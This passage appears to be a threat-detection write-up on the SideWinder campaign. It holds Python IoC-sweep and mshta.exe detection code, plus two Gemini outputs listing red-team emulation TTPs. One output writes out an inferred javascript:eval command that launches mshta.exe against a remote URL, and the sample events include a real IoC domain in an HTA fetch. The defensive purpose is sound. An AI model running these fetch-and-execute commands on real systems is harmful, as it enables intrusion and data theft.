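    "0216ffc6fb679bdf4ea6ee7051213c1e", "433480f7d8642076a8b3793948da5efe",
}


def refang(indicator: str) -> str:
    """Undo the usual defanging ("[.]" for ".", "hxxp" for "http") and lower-case."""
    return indicator.replace("[.]", ".").replace("hxxp", "http").lower()


IOC_DOMAINS = frozenset(refang(d) for d in DEFANGED_DOMAINS)

# Anything that looks like a hostname: dotted labels ending in an alphabetic TLD.
HOST_RE = re.compile(r"(?:[a-z0-9-]+\.)+[a-z]{2,}", re.I)
MD5_RE = re.compile(r"\b[0-9a-f]{32}\b", re.I)


def matches_in_line(line: str, ioc_domains=IOC_DOMAINS):
    """Return the IoC domains a log line touches.

    A hostname matches when it equals an IoC domain or is a subdomain of one
    (www.modpak.info hits modpak.info). A bare suffix test is deliberately
    avoided, so notdirctt888.info does not hit dirctt888.info.
    """
    hits = set()
    for host in HOST_RE.findall(line):
        host = host.lower().rstrip(".")
        for dom in ioc_domains:
            if host == dom or host.endswith("." + dom):
                hits.add(dom)
    return hits


def sweep(lines):
    """Return (line_number, indicator_kind, indicator) for every match."""
    findings = []
    for n, line in enumerate(lines, 1):
        for dom in sorted(matches_in_line(line)):
            findings.append((n, "domain", dom))
        for h in MD5_RE.findall(line):
            h = h.lower()
            if h in DOCUMENT_MD5:
                findings.append((n, "office-document-md5", h))
            elif h in LOADER_MD5:
                findings.append((n, "backdoor-loader-md5", h))
    return findings


# Constructed sample log lines; only the indicators inside them are real.
SAMPLE_LOGS = [
    "2024-06-12T08:13:22Z dns client=10.0.4.17 query=www.modpak.info type=A",
    "2024-06-12T08:13:25Z proxy client=10.0.4.17 GET https://d0wnlaod.com/constructed/index.hta 200",
    "2024-06-12T08:14:01Z dns client=10.0.4.18 query=update.microsoft.com type=A",
    "2024-06-12T08:14:09Z dns client=10.0.4.19 query=notdirctt888.info type=A",
    r"2024-06-12T08:15:40Z av md5=0216ffc6fb679bdf4ea6ee7051213c1e path=C:\Users\user\AppData\Roaming\lib.dll",
]

if __name__ == "__main__":
    for n, kind, ioc in sweep(SAMPLE_LOGS):
        print(f"line {n}: {kind} {ioc}")
```

Run against the constructed lines, the sweep reports the subdomain query on line 1, the HTA fetch on line 2 and the Backdoor Loader hash on line 5, and stays silent on the Microsoft lookup and the look-alike suffix.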

Gemini 2.0

Model: gemini-2.0-flash

Okay, I will extract and structure the TTPs (Tactics, Techniques, and Procedures) from the provided CTI report, focusing on executable actions and excluding passive IOCs.

Phase: Initial Access

  • Technique: Spear Phishing via Malicious Document
  • Procedure: The attacker sends spear-phishing emails with a DOCX file attached. The document uses the remote template injection technique to download an RTF file.

Phase: Execution

  • Technique: RTF Exploit (CVE-2017-11882)
  • Procedure: The RTF file exploits the vulnerability to run a malicious shellcode and initiate a multi-level infection process.
  • Technique: Executing mshta.exe
  • Command: mshta.exe to execute the malicious HTA from a remote server. mshta.exe <remote server>/<path_to_hta>
  • Technique: JavaScript Execution within HTA
  • Procedure: Executes heavily obfuscated JavaScript to load further malware.

Phase: Discovery

  • Technique: System Information Gathering (.NET)
  • Procedure: The Downloader Module enumerates the subfolders at Windows%\Microsoft.NET\Framework\ to find the version of the .NET framework installed on the system and uses the resulting value to configure the environment variable COMPLUS_Version.
  • Technique: Antivirus Product Detection via WMI
  • Procedure: Query WMI to obtain a list of installed products and antivirus software.
  • Technique: Running Process Enumeration and Comparison
  • Procedure: Compare all running process names against an embedded dictionary.
  • Technique: Determine RAM size with the GlobalMemoryStatusEx function.

Phase: Persistence

  • Technique: Scheduled Task Creation (Implied)
  • Procedure: While not explicitly mentioned, the registry key and persistence mechanisms imply the use of scheduled tasks for recurring execution. (Note: No direct command is provided but is implied)
  • Technique: Registry Run Key Modification (Implied)
  • Procedure: Adding an HKCU Run Registry Value for persistence. (Note: No direct command is provided but is implied)

Phase: Payload Delivery / Post Exploitation

  • Technique: DLL Side-Loading
  • Procedure: Use a legitimate application, side-loading it with a malicious DLL.
  • Technique: Memory Injection
  • Procedure: Backdoor Loader loads the "StealerBot" implant into memory.

Phase: Credential Access

  • Technique: Credential Stealing (StealerBot)
  • Procedure: Post-exploitation credential stealing with "StealerBot" from memory.

Notes and Inferred Tactics

  • The report emphasizes the continuous evolution of the attacker's toolset to evade detection, implying frequent updates to code and obfuscation techniques.
  • The tailored nature of certain samples to specific targets and inclusion of the user's name suggests a manual deployment phase by the attacker, likely involving some form of interactive access.

This structured output summarizes the TTPs described in the CTI report, focusing on executable actions and relevant context to facilitate red team emulation.

Gemini 2.5

Model: gemini-2.5-flash-preview-05-20

Here's a structured breakdown of the procedures used by the SideWinder threat actor, suitable for red team emulation:

Phase: Initial Access

  • Technique: Spear-Phishing with Malicious Document (DOCX via Remote Template Injection)
    • Procedure: The attacker sends spear-phishing emails containing a malicious DOCX file attached.
    • Procedure: The DOCX document uses the remote template injection technique to download an RTF file from a remote server.
  • Technique: Exploit Public-Facing Application (CVE-2017-11882)
    • Procedure: The downloaded RTF file exploits the known vulnerability CVE-2017-11882 to run a malicious shellcode.

Phase: Execution

  • Technique: JavaScript Execution
    • Procedure: The shellcode executes embedded JavaScript code.
    • Command (inferred): javascript:eval("var <random_variable_name> = new ActiveXObject('WScript.Shell');<random_variable_name>.Run('mshta.exe <remote_resource_url>',0);window.close();")
  • Technique: Signed Binary Proxy Execution (mshta.exe)
    • Procedure: The embedded JavaScript runs the Windows utility mshta.exe to download additional code (a malicious HTA file) from a remote server.
    • Command: mshta.exe <remote_resource_url>
    • Procedure: The remote HTA file contains heavily obfuscated JavaScript that loads a "Downloader Module" into memory.

Phase: Defense Evasion & Discovery (JavaScript Loader & Downloader Module)

  • Technique: System Information Discovery (RAM Check)
    • Procedure: The JavaScript loader uses GlobalMemoryStatusEx to determine the installed RAM size.
    • Procedure: Execution terminates if the total RAM size is less than 950 MB.
  • Technique: Anti-Static Analysis (DLL Load Check)
    • Procedure: The JavaScript loader attempts to load the nlssorting.dll library.
    • Procedure: Execution terminates if the nlssorting.dll loading operation succeeds.
  • Technique: System Information Discovery (Security Software)
    • Procedure: The "Downloader Module" uses a WMI query to collect the name of the antivirus and its related "productState".
    • Procedure: The "Downloader Module" compares all running process names against an embedded dictionary of security solutions (containing 137 unique process names).
    • Procedure: The WMI query for antivirus products is executed only when no known security processes (e.g., specific antivirus vendors) are running on the system.
  • Technique: Obfuscated Files or Information (Control Flow Flattening)
    • Procedure: New malware variants feature enhanced anti-analysis code and employ Control Flow Flattening more extensively.
  • Technique: Indicator Removal (File Renaming/Path Changes)
    • Procedure: The threat actor frequently changes the names and paths of their malicious files to evade detection.

Phase: Persistence

  • Technique: Hijack Execution Flow (DLL Sideloading)
    • Procedure: The "Backdoor Loader" library is consistently sideloaded using a legitimate and signed application.
  • Technique: Registry Run Keys / Startup Folder
    • Procedure: The malware establishes persistence by setting an HKCU Run Registry Value.
  • Technique: Scheduled Task
    • Procedure: The malware establishes persistence by creating a Windows Task.

Phase: Payload Delivery / Staging

  • Technique: Dropper/Loader (Backdoor Loader)
    • Procedure: The "Backdoor Loader" component's primary function is to load the "StealerBot" implant into memory.
  • Technique: Staged Deployment (C++ Backdoor Loader)
    • Procedure: C++ versions of the "Backdoor Loader" are tailored to specific targets and configured to load the second stage from a specific file path embedded in the code (e.g., C:\Users\[USER_NAME]\AppData\Roaming\valgrind\[REDACTED_FILE_NAME].[REDACTED_EXTENSION]). This suggests manual deployment after initial compromise.

Phase: Command and Control

  • Technique: Standard Application Layer Protocol (HTTPS)
    • Procedure: The C2 server communication uses HTTPS.

Phase: Collection (StealerBot Capabilities)

  • Technique: Input Capture (Keylogging)
    • Tool: Keylogger plugin (part of StealerBot)
  • Technique: Screen Capture
    • Tool: Screenshot Grabber plugin (part of StealerBot)
  • Technique: Data from Local System (File Stealing)
    • Tool: File Stealer plugin (part of StealerBot)
  • Technique: Credential Dumping
    • Tool: RDP Credential Stealer plugin (part of StealerBot)
    • Tool: Credential Phisher plugin (part of StealerBot)
  • Technique: Token Impersonation/Theft
    • Tool: Token Grabber plugin (part of StealerBot)

Phase: Discovery (StealerBot Capabilities)

  • Technique: System Owner/User Discovery
    • Tool: Token Grabber (can be used for this)
  • Technique: Process Discovery / System Information Discovery
    • Tool: Live Console (provides real-time interaction and system exploration)

Phase: Privilege Escalation (StealerBot Capabilities)

  • Technique: Bypass User Account Control (UAC)
    • Tool: UAC Bypass plugin (part of StealerBot)
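All three model outputs converge on one host observable from the report: mshta.exe launched out of an Office document chain, either with a remote resource URL or with an inline javascript: moniker on its command line. The following is an added example of how a defender would encode that as detection logic; it is not code from the Kaspersky report or from the model outputs. It runs over constructed process-creation events whose field names (Image, ParentImage, CommandLine, EventRecordID) follow Sysmon Event ID 1; the events, file paths and the URL path are constructed, the OFFICE_PARENTS set is my choice, and EQNEDT32.EXE is included because CVE-2017-11882 is an Equation Editor bug, which is general knowledge rather than something this page states. A legitimate local HTA launched from explorer.exe is included to show it does not fire.

```python
"""
Detection logic for the mshta.exe step described above: a malicious Office
document triggers CVE-2017-11882 shellcode, which runs mshta.exe against a
remote HTA (or an inline script moniker). Checks constructed process-creation
events shaped like Sysmon Event ID 1 records.

Added example, not code from the Kaspersky report or the model outputs. Field
names follow Sysmon; events, paths and the URL path are constructed.
EQNEDT32.EXE is listed as a suspicious parent because CVE-2017-11882 is an
Equation Editor bug (general knowledge, not stated on this page).
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Processes that should not be launching mshta.exe in a healthy environment.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}

REMOTE_URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
# mshta accepts a script moniker instead of a file, e.g. "mshta javascript:...".
INLINE_SCRIPT_RE = re.compile(r"\b(?:javascript|vbscript):", re.I)


def basename(path: str) -> str:
    """Last component of a Windows or POSIX path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


@dataclass
class Finding:
    event_id: int
    reasons: List[str] = field(default_factory=list)


def evaluate(event: Dict[str, object]) -> Optional[Finding]:
    """Return a Finding for an mshta.exe launch that has any of: an Office or
    Equation Editor parent, a remote URL argument, or an inline script moniker.
    Anything else, including a local HTA started from explorer.exe, yields None."""
    if basename(str(event.get("Image", ""))) != "mshta.exe":
        return None
    parent = basename(str(event.get("ParentImage", "")))
    cmd = str(event.get("CommandLine", ""))
    reasons = []
    if parent in OFFICE_PARENTS:
        reasons.append(f"spawned by document-handling process {parent}")
    urls = REMOTE_URL_RE.findall(cmd)
    if urls:
        reasons.append(f"remote resource on command line: {urls[0]}")
    if INLINE_SCRIPT_RE.search(cmd):
        reasons.append("inline javascript:/vbscript: moniker on command line")
    if not reasons:
        return None
    return Finding(int(event["EventRecordID"]), reasons)


def hunt(events):
    """Evaluate every event and keep only the findings."""
    return [f for f in (evaluate(e) for e in events) if f is not None]


# Constructed events. Event 1 is a legitimate local HTA launch and must not fire.
SAMPLE_EVENTS = [
    {"EventRecordID": 1,
     "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\help.hta"'},
    {"EventRecordID": 2,
     "Image": r"C:\Windows\SysWOW64\mshta.exe",
     "ParentImage": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     # Domain is from the report's IoC list; the path is constructed.
     "CommandLine": "mshta.exe https://d0wnlaod.com/constructed/index.hta"},
    {"EventRecordID": 3,
     "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "mshta.exe javascript:<inline script elided in this constructed event>"},
    {"EventRecordID": 4,
     "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding.event_id, "; ".join(finding.reasons))
```

Events 2 and 3 each trigger two reasons (parent plus remote URL, parent plus inline moniker), while the explorer-launched local HTA and the unrelated notepad.exe launch produce nothing; requiring a reason rather than alerting on every mshta.exe start is what keeps the rule usable on hosts where HTA-based tooling is legitimate.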